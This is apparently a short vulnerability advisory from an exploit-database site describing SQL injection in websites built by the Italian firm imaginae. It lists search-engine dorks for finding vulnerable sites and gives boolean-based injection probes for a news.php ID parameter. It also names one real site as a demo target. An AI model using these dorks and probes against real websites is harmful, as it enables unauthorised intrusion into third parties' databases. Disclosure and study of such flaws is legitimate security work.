imaginae SQL Injection

2020.11.08
ir h4shur (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

[+] Title: imaginae SQL Injection [+] Author: h4shur [+] date:2020-11-08 [+] Vendor Homepage: https://www.imaginae.it/ [+] Software Link: https://www.imaginae.it/ [+] Tested on: Windows 10 & Google Chrome [+] Category : Web Application Bugs [+} Dork : intext:"CREDITS: IMAGINAE.IT" intext:"CREDITS: IMAGINAE.IT" inurl:"NEWS.php?ID=" intext:"CREDITS: IMAGINAE.IT" inurl:"php?ID=" ### Note: [+] Add the quotation mark (') to the end of the link : * Target.com/news.php?ID=4' [+] First add "and 1=1" and then "and 1=2" to the end of the link : * Target.com/news.php?ID=4 and 1=1 * Target.com/news.php?ID=4 and 1=2 ### Demo: [+] https://www.maranello-service.it/en-news.php?id=ART0000000010 ### Contact Me : * Email : h4shursec@gmail.com * twitter : @h4shur * Telegram : @h4shur * Instagram : @netedit0r


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top